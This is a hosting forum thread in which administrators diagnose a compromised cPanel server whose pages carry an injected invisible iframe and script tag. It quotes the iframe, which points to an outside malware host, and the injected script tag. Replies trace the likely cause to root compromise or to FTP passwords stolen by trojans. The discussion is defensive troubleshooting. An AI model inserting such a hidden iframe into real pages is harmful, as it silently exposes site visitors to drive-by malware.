Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : iframe js attack

[sh4ka]

Hello,

It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory.

We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess.

I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?

This is a RHE 4 + cPanel server, any help is appreciated. This is the iframe code:

Code:

iframe width=1 height=1 src='http://x4iomu.wanna.somepills.in/images/enter.php?n2'

Thanks.

[ub3r]

Do you run mod_php or phpsuexec?

[1boss1]

Tell your customer to run comprehensive scans on their PC, and change their login details for FTP.

[elmister]

I saw this on other server a few hours ago, customer files didn't get modified, and this also happened randomly even with a file with just a phpinfo() line on it. I'm afraid is deeped than a simple script injection

We should share some info about the affected servers, this had Apache 1.3 and PHP 4.4.8

[sh4ka]

Same here PHP 4.4.8 and Apache 1.3, we also tried to restore weekly backups and the problem stills

[elmister]

I have more info, in the phpinfo output, says the following

Quote:

<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><script language='JavaScript' type='text/javascript' src='hhnkx.js'></script><div class="center">

It inserts a script tag after the boy tag, being this just a phpinfo seems to me that this is being inserted automatically by 'something' in the Apache webserver or the php

[elmister]

Quote:

Originally Posted by sh4ka

Same here PHP 4.4.8 and Apache 1.3, we also tried to restore weekly backups and the problem stills

You have a PM from me, ¿btw, are we working on the same server?

[tix3]

This could be one of the famous random scripts injections.If this is the case you are looking at a root comprmisation problem.
More info is available here

[elmister]

Yes, that's exactly what happens on the box, it was also mentioned on cpanel.net website, according to that, servers were compromised, in this case root was probably achieved because it was using an old kernel that could be exploited

[RodneyB]

Is there a fix for this?

[jalapeno55]

Quote:

Originally Posted by RodneyB

Is there a fix for this?

Yea, reinstall the OS.

[InfiniteTech]

Thats one heck of a fix

[kittykills]

Quote:

Originally Posted by jalapeno55

Yea, reinstall the OS.

If move to another server, will this be fixed?

[brianoz]

There's been discussion of this elsewhere; one of the most common entry vectors has been through passwords of ftp accounts. What happens is that your PC gets infected with a trojan which then sends them all your passwords. Simply resetting all your passwords isn't enough, you have to do a clean install on your PC as the trojans often aren't recognized by commercial anti-virus software, yet.

[1boss1]

Exactly as Brian the fellow Aussie said, every time i have encountered this problem it was due to an infected PC sending out the login details. To test this you can try changing your passwords on a different PC, chances are it wont happen again.